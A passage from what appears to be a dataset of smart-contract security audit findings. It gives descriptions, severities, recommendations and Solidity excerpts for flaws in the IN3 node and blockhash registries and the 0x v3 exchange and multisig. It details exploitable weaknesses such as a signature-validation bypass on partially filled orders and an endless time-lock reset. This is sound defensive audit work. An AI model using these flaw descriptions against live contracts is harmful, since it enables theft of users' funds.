memory n = nodes[si.index];\\n\\n unregisterNodeInternal(si, n);\\n\\n}\\n```\\nчResolution\\nThis issue has been addressed with a large change-set that splits the NodeRegistry into two contracts, which results in a code flow that mitigates this issue by making the logic contract upgradable (after 47 days of notice). The resolution adds more complexity to the system, and this complexity is not covered by the original audit. Splitting up the contracts has the side-effect of events being emitted by two different contracts, requiring nodes to subscribe to both contracts' events.\\nThe need for removing malicious nodes from the registry, arises from the design decision to allow anyone to register any URL. These URLs might not actually belong to the registrar of the URL and might not be IN3 nodes. This is partially mitigated by a centralization feature introduced in the mitigation phase that implements whitelist functionality for adding nodes.\\nWe generally advocate against adding complexity, centralization and upgrading mechanisms that can allow one party to misuse functionalities of the contract system for their benefit (e.g. `adminSetNodeDeposit` is only used to reset the deposit but allows the Logic contract to set any deposit; the logic contract is set by the owner and there is a 47 day timelock).\\nWe believe the solution to this issue, should have not been this complex. The trust model of the system is changed with this solution, now the logic contract can allow the admin a wide range of control over the system state and data.\\nThe following statement has been provided with the change-set:\\nDuring the 1st year, we will keep the current mechanic even though it's a centralized approach. However, we changed the structure of the smart contracts and separated the NodeRegistry into two different smart contracts: NodeRegistryLogic and NodeRegistryData. After a successful deployment only the NodeRegistryLogic-contract is able to write data into the NodeRegistryData-contract. This way, we can keep the stored data (e.g. the nodeList) in the NodeRegistryData-contract while changing the way the data gets added/updated/removed is handled in the NodeRegistryLogic-contract. We also provided a function to update the NodeRegistryLogic-contract, so that we are able to change to a better solution for removing nodes in an updated contract.\\nProvide a solution for the network to remove fraudulent node entries. This could be done by voting mechanism (with staking, etc).чч```\\n/// @dev only callable in the 1st year after deployment\\nfunction removeNodeFromRegistry(address \\_signer)\\n external\\n onlyActiveState(\\_signer)\\n{\\n\\n // solium-disable-next-line security/no-block-members\\n require(block.timestamp < (blockTimeStampDeployment + YEAR\\_DEFINITION), \"only in 1st year\");// solhint-disable-line not-rely-on-time\\n require(msg.sender == unregisterKey, \"only unregisterKey is allowed to remove nodes\");\\n\\n SignerInformation storage si = signerIndex[\\_signer];\\n In3Node memory n = nodes[si.index];\\n\\n unregisterNodeInternal(si, n);\\n\\n}\\n```\\n -NodeRegistry.registerNodeFor() no replay protection and expiration Won't FixчmediumчAn owner can register a node with the signer not being the owner by calling `registerNodeFor`. The owner submits a message signed for the owner including the properties of the node including the url.\\nThe signed data does not include the `registryID` nor the NodeRegistry's address and can therefore be used by the owner to submit the same node to multiple registries or chains without the signers consent.\\nThe signed data does not expire and can be re-used by the owner indefinitely to submit the same node again to future contracts or the same contract after the node has been removed.\\nArguments are not validated in the external function (also see issue 6.17)\\n```\\nbytes32 tempHash = keccak256(\\n abi.encodePacked(\\n \\_url,\\n \\_props,\\n \\_timeout,\\n \\_weight,\\n msg.sender\\n )\\n);\\n```\\nчInclude `registryID` and an expiration timestamp that is checked in the contract with the signed data. Validate function arguments.чч```\\nbytes32 tempHash = keccak256(\\n abi.encodePacked(\\n \\_url,\\n \\_props,\\n \\_timeout,\\n \\_weight,\\n msg.sender\\n )\\n);\\n```\\n -BlockhashRegistry - Structure of provided blockheaders should be validatedчmediumч`getParentAndBlockhash` takes an rlp-encoded blockheader blob, extracts the parent parent hash and returns both the parent hash and the calculated blockhash of the provided data. The method is used to add blockhashes to the registry that are older than 256 blocks as they are not available to the evm directly. This is done by establishing a trust-chain from a blockhash that is already in the registry up to an older block\\nThe method assumes that valid rlp encoded data is provided but the structure is not verified (rlp decodes completely; block number is correct; timestamp is younger than prevs, …), giving a wide range of freedom to an attacker with enough hashing power (or exploiting potential future issues with keccak) to forge blocks that would never be accepted by clients, but may be accepted by this smart contract. (threat: mining pool forging arbitrary non-conformant blocks to exploit the BlockhashRegistry)\\nIt is not checked that input was actually provided. However, accessing an array at an invalid index will raise an exception in the EVM. Providing a single byte > `0xf7` will yield a result and succeed even though it would have never been accepted by a real node.\\nIt is assumed that the first byte is the rlp encoded length byte and an offset into the provided `_blockheader` bytes-array is calculated. Memory is subsequently accessed via a low-level `mload` at this calculated offset. However, it is never validated that the offset actually lies within the provided range of bytes `_blockheader` leading to an out-of-bounds memory read access.\\nThe rlp encoded data is only partially decoded. For the first rlp list the number of length bytes is extracted. For the rlp encoded long string a length byte of 1 is assumed. The inline comment appears to be inaccurate or might be misleading. `// we also have to add \"2\" = 1 byte to it to skip the length-information`\\nInvalid intermediary blocks (e.g. with parent hash 0x00) will be accepted potentially allowing an attacker to optimize the effort needed to forge invalid blocks skipping to the desired blocknumber overwriting a certain blockhash (see issue 6.18)\\nWith one collisions (very unlikely) an attacker can add arbitrary or even random values to the BlockchainRegistry. The parent-hash of the starting blockheader cannot be verified by the contract ([target_block_random]<--parent_hash--[rnd]<--parent_hash--[rnd]<--parent_hash--...<--parent_hash--[collision]<--parent_hash_collission--[anchor_block]). While nodes can verify block structure and bail on invalid structure and check the first blocks hash and make sure the chain is in-tact the contract can't. Therefore one cannot assume the same trust in the blockchain registry when recreating blocks compared to running a full node.\\n```\\nfunction getParentAndBlockhash(bytes memory \\_blockheader) public pure returns (bytes32 parentHash, bytes32 bhash) {\\n\\n /// we need the 1st byte of the blockheader to calculate the position of the parentHash\\n uint8 first = uint8(\\_blockheader[0]);\\n\\n /// calculates the offset\\n /// by using the 1st byte (usually f9) and substracting f7 to get the start point of the parentHash information\\n /// we also have to add \"2\" = 1 byte to it to skip the length-information\\n require(first > 0xf7, \"invalid offset\");\\n uint8 offset = first - 0xf7 + 2;\\n\\n /// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n // solium-disable-next-line security/no-inline-assembly\\n assembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n }\\n bhash = keccak256(\\_blockheader);\\n```\\nчValidate that the provided data is within a sane range of bytes that is expected (min/max blockheader sizes).\\nValidate that the provided data is actually an rlp encoded blockheader.\\nValidate that the offset for the parent Hash is within the provided data.\\nValidate that the parent Hash is non zero.\\nValidate that blockhashes do not repeat.чч```\\nfunction getParentAndBlockhash(bytes memory \\_blockheader) public pure returns (bytes32 parentHash, bytes32 bhash) {\\n\\n /// we need the 1st byte of the blockheader to calculate the position of the parentHash\\n uint8 first = uint8(\\_blockheader[0]);\\n\\n /// calculates the offset\\n /// by using the 1st byte (usually f9) and substracting f7 to get the start point of the parentHash information\\n /// we also have to add \"2\" = 1 byte to it to skip the length-information\\n require(first > 0xf7, \"invalid offset\");\\n uint8 offset = first - 0xf7 + 2;\\n\\n /// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n // solium-disable-next-line security/no-inline-assembly\\n assembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n }\\n bhash = keccak256(\\_blockheader);\\n```\\n -Registries - Incomplete input validation and inconsistent order of validations PendingчmediumчMethods and Functions usually live in one of two worlds:\\n`public` API - methods declared with visibility `public` or `external` exposed for interaction by other parties\\n`internal` API - methods declared with visibility `internal`, `private` that are not exposed for interaction by other parties\\nWhile it is good practice to visually distinguish internal from public API by following commonly accepted naming convention e.g. by prefixing internal functions with an underscore (_doSomething vs. doSomething) or adding the keyword `unsafe` to `unsafe` functions that are not performing checks and may have a dramatic effect to the system (_unsafePayout vs. RequestPayout), it is important to properly verify that inputs to methods are within expected ranges for the implementation.\\nInput validation checks should be explicit and well documented as part of the code's documentation. This is to make sure that smart-contracts are robust against erroneous inputs and reduce the potential attack surface for exploitation.\\nIt is good practice to verify the methods input as early as possible and only perform further actions if the validation succeeds. Methods can be split into an external or public API that performs initial checks and subsequently calls an internal method that performs the action.\\nThe following lists some public API methods that are not properly checking the provided data:\\n`BlockhashRegistry.reCalculateBlockheaders` - bhash can be zero; blockheaders can be empty\\nBlockhashRegistry.getParentAndBlockhash- blockheader structure can be random as long as parenthash can be extracted\\n`BlockhashRegistry.recreateBlockheaders` - blockheaders can be empty; Arguments should be validated before calculating values that depend on them:\\n```\\nassert(\\_blockNumber > \\_blockheaders.length);\\n```\\n\\n`BlockhashRegistry.searchForAvailableBlock` - `_startNumber + _numBlocks` can be > `block.number; _startNumber + _numBlocks` can overflow.\\n`NodeRegistry.removeNode` - should check `require(_nodeIndex < nodes.length)` first before any other action.\\n```\\nfunction removeNode(uint \\_nodeIndex) internal {\\n // trigger event\\n emit LogNodeRemoved(nodes[\\_nodeIndex].url, nodes[\\_nodeIndex].signer);\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(nodes[\\_nodeIndex].url))];\\n uint length = nodes.length;\\n\\n assert(length > 0);\\n```\\n\\n`NodeRegistry.registerNodeFor` - Signature version `v` should be checked to be either `27 || 28` before verifying it.\\n```\\nfunction registerNodeFor(\\n string calldata \\_url,\\n uint64 \\_props,\\n uint64 \\_timeout,\\n address \\_signer,\\n uint64 \\_weight,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n)\\n external\\n payable\\n{\\n```\\n\\n`NodeRegistry.revealConvict` - unchecked `signer`\\n```\\nSignerInformation storage si = signerIndex[\\_signer];\\n```\\n\\n`NodeRegistry.revealConvict` - signer status can be checked earlier.\\n```\\nrequire(si.stage != Stages.Convicted, \"node already convicted\");\\n```\\n\\n`NodeRegistry.updateNode` - the check if the `newURL` is registered can be done earlier\\n```\\nrequire(!urlIndex[newURl].used, \"url is already in use\");\\n```\\nчUse Checks-Effects-Interactions pattern for all functions.чч```\\nassert(\\_blockNumber > \\_blockheaders.length);\\n```\\n -BlockhashRegistry - recreateBlockheaders allows invalid parent hashes for intermediary blocksчmediumчIt is assumed that a blockhash of `0x00` is invalid, but the method accepts intermediary parent hashes extracted from blockheaders that are zero when establishing the trust chain.\\n`recreateBlockheaders` relies on `reCalculateBlockheaders` to correctly establish a chain of trust from the provided list of `_blockheaders` to a valid blockhash stored in the contract. However, `reCalculateBlockheaders` fails to raise an exception in case `getParentAndBlockhash` returns a blockhash of `0x00`. Subsequently it will skip over invalid blockhashes and continue to establish the trust chain without raising an error.\\nThis may allow an attacker with enough hashing power to store a blockheader hash that is actually invalid on the real chain but accepted within this smart contract. This may even only be done temporarily to overwrite an existing hash for a short period of time (see https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/24).\\n```\\nfor (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n}\\n```\\nчStop processing the array of `_blockheaders` immediately if a blockheader is invalid.чч```\\nfor (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n}\\n```\\n -BlockhashRegistry - recreateBlockheaders succeeds and emits an event even though no blockheaders have been providedчmediumчThe method is used to re-create blockhashes from a list of rlp-encoded `_blockheaders`. However, the method never checks if `_blockheaders` actually contains items. The result is, that the method will unnecessarily store the same value that is already in the `blockhashMapping` at the same location and wrongly log `LogBlockhashAdded` even though nothing has been added nor changed.\\nassume `_blockheaders` is empty and the registry already knows the blockhash of `_blockNumber`\\n```\\nfunction recreateBlockheaders(uint \\_blockNumber, bytes[] memory \\_blockheaders) public {\\n\\n bytes32 currentBlockhash = blockhashMapping[\\_blockNumber];\\n require(currentBlockhash != 0x0, \"parentBlock is not available\");\\n\\n bytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n require(calculatedHash != 0x0, \"invalid headers\");\\n```\\n\\nAn attempt is made to re-calculate the hash of an empty `_blockheaders` array (also passing the `currentBlockhash` from the registry)\\n```\\nbytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n```\\n\\nThe following loop in `reCalculateBlockheaders` is skipped and the `currentBlockhash` is returned.\\n```\\nfunction reCalculateBlockheaders(bytes[] memory \\_blockheaders, bytes32 \\_bHash) public pure returns (bytes32 bhash) {\\n\\n bytes32 currentBlockhash = \\_bHash;\\n bytes32 calcParent = 0x0;\\n bytes32 calcBlockhash = 0x0;\\n\\n /// save to use for up to 200 blocks, exponential increase of gas-usage afterwards\\n for (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n }\\n\\n return currentBlockhash;\\n```\\n\\nThe assertion does not fire, the `bnr` to store the `calculatedHash` is the same as the one initially provided to the method as an argument.. Nothing has changed but an event is emitted.\\n```\\n /// we should never fail this assert, as this would mean that we were able to recreate a invalid blockchain\\n assert(\\_blockNumber > \\_blockheaders.length);\\n uint bnr = \\_blockNumber - \\_blockheaders.length;\\n blockhashMapping[bnr] = calculatedHash;\\n emit LogBlockhashAdded(bnr, calculatedHash);\\n}\\n```\\nчThe method is crucial for the system to work correctly and must be tightly controlled by input validation. It should not be allowed to overwrite an existing value in the contract (issue 6.29) or emit an event even though nothing has happened. Therefore validate that user provided input is within safe bounds. In this case, that at least one `_blockheader` has been provided. Validate that `_blockNumber` is less than `block.number` and do not expect that parts of the code will throw and safe the contract from exploitation.чч```\\nfunction recreateBlockheaders(uint \\_blockNumber, bytes[] memory \\_blockheaders) public {\\n\\n bytes32 currentBlockhash = blockhashMapping[\\_blockNumber];\\n require(currentBlockhash != 0x0, \"parentBlock is not available\");\\n\\n bytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n require(calculatedHash != 0x0, \"invalid headers\");\\n```\\n -NodeRegistry.updateNode replaces signer with owner and emits inconsistent eventsчmediumчWhen the `owner` calls `updateNode()` function providing a new `url` for the node, the `signer` of the `url` is replaced by `msg.sender` which in this case is the `owner` of the node. Note that new URL can resolve to the same URL as before (See https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/36).\\n```\\nif (newURl != keccak256(bytes(node.url))) {\\n\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(node.url))];\\n\\n // make sure the new url is not already in use\\n require(!urlIndex[newURl].used, \"url is already in use\");\\n\\n UrlInformation memory ui;\\n ui.used = true;\\n ui.signer = msg.sender;\\n urlIndex[newURl] = ui;\\n node.url = \\_url;\\n}\\n```\\n\\nFurthermore, the method emits a `LogNodeRegistered` event when the node structure is updated. However, the event will always emit `msg.sender` as the signer even though that might not be true. For example, if the `url` does not change, the signer can still be another account that was previously registered with `registerNodeFor` and is not necessarily the `owner`.\\n```\\nemit LogNodeRegistered(\\n node.url,\\n \\_props,\\n msg.sender,\\n node.deposit\\n);\\n```\\n\\n```\\nevent LogNodeRegistered(string url, uint props, address signer, uint deposit);\\n```\\nчThe `updateNode()` function gets the `signer` as an input used to reference the node structure and this `signer` should be set for the `UrlInformation`.\\n```\\nfunction updateNode(\\n address \\_signer,\\n string calldata \\_url,\\n uint64 \\_props,\\n uint64 \\_timeout,\\n uint64 \\_weight\\n )\\n```\\n\\nThe method should actually only allow to change node properties when `owner==signer` otherwise `updateNode` is bypassing the strict requirements enforced with `registerNodeFor` where e.g. the `url` needs to be signed by the signer in order to register it.\\nThe emitted event should always emit `node.signer` instead of `msg.signer` which can be wrong.\\nThe method should emit its own distinct event `LogNodeUpdated` for audit purposes and to be able to distinguish new node registrations from node structure updates. This might also require software changes to client/node implementations to listen for node updates.чч```\\nif (newURl != keccak256(bytes(node.url))) {\\n\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(node.url))];\\n\\n // make sure the new url is not already in use\\n require(!urlIndex[newURl].used, \"url is already in use\");\\n\\n UrlInformation memory ui;\\n ui.used = true;\\n ui.signer = msg.sender;\\n urlIndex[newURl] = ui;\\n node.url = \\_url;\\n}\\n```\\n -NodeRegistry - In3Node memory n is never usedчlowчNodeRegistry `In3Node memory n` is never used inside the modifier `onlyActiveState`.\\n```\\nmodifier onlyActiveState(address \\_signer) {\\n\\n SignerInformation memory si = signerIndex[\\_signer];\\n require(si.stage == Stages.Active, \"address is not an in3-signer\");\\n\\n In3Node memory n = nodes[si.index];\\n assert(nodes[si.index].signer == \\_signer);\\n \\_;\\n}\\n```\\nчUse `n` in the assertion to access the node signer `assert(n.signer == _signer);` or directly access it from storage and avoid copying the struct.чч```\\nmodifier onlyActiveState(address \\_signer) {\\n\\n SignerInformation memory si = signerIndex[\\_signer];\\n require(si.stage == Stages.Active, \"address is not an in3-signer\");\\n\\n In3Node memory n = nodes[si.index];\\n assert(nodes[si.index].signer == \\_signer);\\n \\_;\\n}\\n```\\n -NodeRegistry - removeNode unnecessarily casts the nodeIndex to uint64 potentially truncating its valueчlowч`removeNode` removes a node from the Nodes array. This is done by copying the last node of the array to the `_nodeIndex` of the node that is to be removed. Finally the node array size is decreased.\\nA Node's index is also referenced in the `SignerInformation` struct. This index needs to be adjusted when removing a node from the array as the last node is copied to the index of the node that is to be removed.\\nWhen adjusting the Node's index in the `SignerInformation` struct `removeNode` casts the index to `uint64`. This is both unnecessary as the struct defines the index as `uint` and theoretically dangerous if a node at an index greater than `uint64_max` is removed. The resulting `SignerInformation` index will be truncated to `uint64` leading to an inconsistency in the contract.\\n```\\nstruct SignerInformation {\\n uint64 lockedTime; /// timestamp until the deposit of an in3-node can not be withdrawn after the node was removed\\n address owner; /// the owner of the node\\n\\n Stages stage; /// state of the address\\n\\n uint depositAmount; /// amount of deposit to be locked, used only after a node had been removed\\n\\n uint index; /// current index-position of the node in the node-array\\n}\\n```\\n\\n```\\n// move the last entry to the removed one.\\nIn3Node memory m = nodes[length - 1];\\nnodes[\\_nodeIndex] = m;\\n\\nSignerInformation storage si = signerIndex[m.signer];\\nsi.index = uint64(\\_nodeIndex);\\nnodes.length--;\\n```\\nчResolution\\nFixed as per recommendation https://git.slock.it/in3/in3-contracts/commit/6c35dd422e27eec1b1d2f70e328268014cadb515.\\nDo not cast and therefore truncate the index.чч```\\nstruct SignerInformation {\\n uint64 lockedTime; /// timestamp until the deposit of an in3-node can not be withdrawn after the node was removed\\n address owner; /// the owner of the node\\n\\n Stages stage; /// state of the address\\n\\n uint depositAmount; /// amount of deposit to be locked, used only after a node had been removed\\n\\n uint index; /// current index-position of the node in the node-array\\n}\\n```\\n -BlockhashRegistry- assembly code can be optimizedчlowчThe following code can be optimized by removing `mload` and mstore:\\n```\\nrequire(first > 0xf7, \"invalid offset\");\\nuint8 offset = first - 0xf7 + 2;\\n\\n/// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n// solium-disable-next-line security/no-inline-assembly\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n}\\n```\\nч```\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n //mstore(0x20, \\_blockheader) //@audit should assign 0x20ptr to variable first and use it.\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n \\_blockheader, 0x20\\n ), offset)\\n )\\n }\\n```\\nчч```\\nrequire(first > 0xf7, \"invalid offset\");\\nuint8 offset = first - 0xf7 + 2;\\n\\n/// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n// solium-disable-next-line security/no-inline-assembly\\nassembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n}\\n```\\n -BlockhashRegistry - Existing blockhashes can be overwrittenчlowчLast 256 blocks, that are available in the EVM environment, are stored in `BlockhashRegistry` by calling `snapshot()` or `saveBlockNumber(uint _blockNumber)` functions. Older blocks are recreated by calling `recreateBlockheaders`.\\nThe methods will overwrite existing blockhashes.\\n```\\nfunction saveBlockNumber(uint \\_blockNumber) public {\\n\\n bytes32 bHash = blockhash(\\_blockNumber);\\n\\n require(bHash != 0x0, \"block not available\");\\n\\n blockhashMapping[\\_blockNumber] = bHash;\\n emit LogBlockhashAdded(\\_blockNumber, bHash);\\n}\\n```\\n\\n```\\nblockhashMapping[bnr] = calculatedHash;\\n```\\nчResolution\\nAddressed with 80bb6ecf and 17d450cf by checking if blockhash exists and changing the `assert` to `require`.\\nIf a block is already saved in the smart contract, it can be checked and a SSTORE can be prevented to save gas. Require that blocknumber hash is not stored.\\n```\\nrequire(blockhashMapping[\\_blockNumber] == 0x0, \"block already saved\");\\n```\\nчч```\\nfunction saveBlockNumber(uint \\_blockNumber) public {\\n\\n bytes32 bHash = blockhash(\\_blockNumber);\\n\\n require(bHash != 0x0, \"block not available\");\\n\\n blockhashMapping[\\_blockNumber] = bHash;\\n emit LogBlockhashAdded(\\_blockNumber, bHash);\\n}\\n```\\n -An account that confirms a transaction via AssetProxyOwner can indefinitely block that transactionчhighчWhen a transaction reaches the required number of confirmations in `confirmTransaction()`, its confirmation time is recorded:\\n```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\n\\nBefore the time lock has elapsed and the transaction is executed, any of the owners that originally confirmed the transaction can revoke their confirmation via revokeConfirmation():\\n```\\n/// @dev Allows an owner to revoke a confirmation for a transaction.\\n/// @param transactionId Transaction ID.\\nfunction revokeConfirmation(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n confirmed(transactionId, msg.sender)\\n notExecuted(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = false;\\n emit Revocation(msg.sender, transactionId);\\n}\\n```\\n\\nImmediately after, that owner can call `confirmTransaction()` again, which will reset the confirmation time and thus the time lock.\\nThis is especially troubling in the case of a single compromised key, but it's also an issue for disagreement among owners, where any m of the n owners should be able to execute transactions but could be blocked.\\nMitigations\\nOnly an owner can do this, and that owner has to be part of the group that originally confirmed the transaction. This means the malicious owner may have to front run the others to make sure they're in that initial confirmation set.\\nEven once a malicious owner is in position to execute this perpetual delay, they need to call `revokeConfirmation()` and `confirmTransaction()` again each time. Another owner can attempt to front the attacker and execute their own `confirmTransaction()` immediately after the `revokeConfirmation()` to regain control.чThere are several ways to address this, but to best preserve the original `MultiSigWallet` semantics, once a transaction has reached the required number of confirmations, it should be impossible to revoke confirmations. In the original implementation, this is enforced by immediately executing the transaction when the final confirmation is received.чч```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\n -Orders with signatures that require regular validation can have their validation bypassed if the order is partially filledчhighчThe signature types `Wallet`, `Validator`, and `EIP1271Wallet` require explicit validation to authorize each action performed on a given order. This means that if an order was signed using one of these methods, the `Exchange` must perform a validation step on the signature each time the order is submitted for a partial fill. In contrast, the other canonical signature types (EIP712, `EthSign`, and PreSigned) are only required to be validated by the `Exchange` on the order's first fill; subsequent fills take the order's existing fill amount as implicit validation that the order has a valid, published signature.\\nThis re-validation step for `Wallet`, `Validator`, and `EIP1271Wallet` signatures is intended to facilitate their use with contracts whose validation depends on some state that may change over time. For example, a validating contract may call into a price feed and determine that some order is invalid if its price deviates from some expected range. In this case, the repeated validation allows 0x users to make orders with custom fill conditions which are evaluated at run-time.\\nWe found that if the sender provides the contract with an invalid signature after the order in question has already been partially filled, the regular validation check required for `Wallet`, `Validator`, and `EIP1271Wallet` signatures can be bypassed entirely.\\nSignature validation takes place in `MixinExchangeCore._assertFillableOrder`. A signature is only validated if it passes the following criteria:\\n```\\n// Validate either on the first fill or if the signature type requires\\n// regular validation.\\naddress makerAddress = order.makerAddress;\\nif (orderInfo.orderTakerAssetFilledAmount == 0 ||\\n \\_doesSignatureRequireRegularValidation(\\n orderInfo.orderHash,\\n makerAddress,\\n signature\\n )\\n) {\\n```\\n\\nIn effect, signature validation only occurs if:\\n`orderInfo.orderTakerAssetFilledAmount == 0` OR\\n`_doesSignatureRequireRegularValidation(orderHash, makerAddress, signature)`\\nIf an order is partially filled, the first condition will evaluate to false. Then, that order's signature will only be validated if `_doesSignatureRequireRegularValidation` evaluates to true:\\n```\\nfunction \\_doesSignatureRequireRegularValidation(\\n bytes32 hash,\\n address signerAddress,\\n bytes memory signature\\n)\\n internal\\n pure\\n returns (bool needsRegularValidation)\\n{\\n // Read the signatureType from the signature\\n SignatureType signatureType = \\_readSignatureType(\\n hash,\\n signerAddress,\\n signature\\n );\\n\\n // Any signature type that makes an external call needs to be revalidated\\n // with every partial fill\\n needsRegularValidation =\\n signatureType == SignatureType.Wallet ||\\n signatureType == SignatureType.Validator ||\\n signatureType == SignatureType.EIP1271Wallet;\\n return needsRegularValidation;\\n}\\n```\\n\\nThe `SignatureType` returned from `_readSignatureType` is directly cast from the final byte of the passed-in signature. Any value that does not cast to `Wallet`, `Validator`, and `EIP1271Wallet` will cause `_doesSignatureRequireRegularValidation` to return false, skipping validation.\\nThe result is that an order whose signature requires regular validation can be forced to skip validation if it has been partially filled, by passing in an invalid signature.чThere are a few options for remediation:\\nHave the `Exchange` validate the provided signature every time an order is filled.\\nRecord the first seen signature type or signature hash for each order, and check that subsequent actions are submitted with a matching signature.\\nThe first option requires the fewest changes, and does not require storing additional state. While this does mean some additional cost validating subsequent signatures, we feel the increase in flexibility is well worth it, as a maker could choose to create multiple valid signatures for use across different order books.чч```\\n// Validate either on the first fill or if the signature type requires\\n// regular validation.\\naddress makerAddress = order.makerAddress;\\nif (orderInfo.orderTakerAssetFilledAmount == 0 ||\\n \\_doesSignatureRequireRegularValidation(\\n orderInfo.orderHash,\\n makerAddress,\\n signature\\n )\\n) {\\n```\\n -Changing the owners or required confirmations in the AssetProxyOwner can unconfirm a previously confirmed transactionчmediumчOnce a transaction has been confirmed in the `AssetProxyOwner`, it cannot be executed until a lock period has passed. During that time, any change to the number of required confirmations will cause this transaction to no longer be executable.\\nIf the number of required confirmations was decreased, then one or more owners will have to revoke their confirmation before the transaction can be executed.\\nIf the number of required confirmations was increased, then additional owners will have to confirm the transaction, and when the new required number of confirmations is reached, a new confirmation time will be recorded, and thus the time lock will restart.\\nSimilarly, if an owner that had previously confirmed the transaction is replaced, the number of confirmations will drop for existing transactions, and they will need to be confirmed again.\\nThis is not disastrous, but it's almost certainly unintended behavior and may make it difficult to make changes to the multisig owners and parameters.\\n`executeTransaction()` requires that at the time of execution, the transaction is confirmed:\\n```\\nfunction executeTransaction(uint256 transactionId)\\n public\\n notExecuted(transactionId)\\n fullyConfirmed(transactionId)\\n```\\n\\n`isConfirmed()` checks for exact equality with the number of required confirmations. Having too many confirmations is just as bad as too few:\\n```\\n/// @dev Returns the confirmation status of a transaction.\\n/// @param transactionId Transaction ID.\\n/// @return Confirmation status.\\nfunction isConfirmed(uint256 transactionId)\\n public\\n view\\n returns (bool)\\n{\\n uint256 count = 0;\\n for (uint256 i = 0; i < owners.length; i++) {\\n if (confirmations[transactionId][owners[i]]) {\\n count += 1;\\n }\\n if (count == required) {\\n return true;\\n }\\n }\\n}\\n```\\n\\nIf additional confirmations are required to reconfirm a transaction, that resets the time lock:\\n```\\n/// @dev Allows an owner to confirm a transaction.\\n/// @param transactionId Transaction ID.\\nfunction confirmTransaction(uint256 transactionId)\\n public\\n ownerExists(msg.sender)\\n transactionExists(transactionId)\\n notConfirmed(transactionId, msg.sender)\\n notFullyConfirmed(transactionId)\\n{\\n confirmations[transactionId][msg.sender] = true;\\n emit Confirmation(msg.sender, transactionId);\\n if (isConfirmed(transactionId)) {\\n \\_setConfirmationTime(transactionId, block.timestamp);\\n }\\n}\\n```\\nчAs in https://github.com/ConsenSys/0x-v3-audit-2019-09/issues/39, the semantics of the original `MultiSigWallet` were that once a transaction is fully confirmed, it's immediately executed. The time lock means this is no longer possible, but it is possible to record that the transaction is confirmed and never allow this to change. In fact, the confirmation time already records this. Once the confirmation time is non-zero, a transaction should always be considered confirmed.чч```\\nfunction executeTransaction(uint256 transactionId)\\n public\\n notExecuted(transactionId)\\n 